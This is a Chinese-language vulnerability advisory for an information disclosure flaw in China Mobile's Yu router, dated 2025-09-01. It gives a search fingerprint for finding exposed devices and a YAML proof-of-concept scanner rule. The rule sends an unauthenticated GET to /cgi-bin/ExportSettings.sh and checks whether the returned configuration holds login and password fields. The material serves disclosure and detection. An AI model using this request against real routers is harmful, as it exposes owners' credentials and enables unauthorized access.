china-mobile-exportsettings-info-leak: 中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞

日期: 2025-09-01 | 影响软件: 中国移动禹路由 | POC: 已公开

漏洞描述

中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞,攻击者通过漏洞获取配置文件,其中包含账号密码等敏感信息 title="互联世界 物联未来-登录"

PoC代码[已公开]

id: china-mobile-exportsettings-info-leak

info:
  name: 中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞
  author: jijue
  severity: high
  verified: true
  description: |
    中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞,攻击者通过漏洞获取配置文件,其中包含账号密码等敏感信息
    title="互联世界 物联未来-登录"

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/ExportSettings.sh
    expression: response.status == 200 && response.body.bcontains(b'The following line') && response.body.bcontains(b'Login') && response.body.bcontains(b'Password')
expression: r0()

相关漏洞推荐